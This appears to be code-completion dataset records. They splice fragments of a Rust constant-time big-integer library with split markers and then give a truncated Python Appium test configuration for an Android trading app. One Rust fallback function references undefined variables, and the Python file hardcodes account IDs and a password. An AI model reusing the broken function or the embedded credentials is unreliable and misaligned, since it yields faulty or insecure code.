let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
} | ///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced); | random_line_split |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn | (&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| shr_n | identifier_name |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創 |
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10',
'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000,
'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
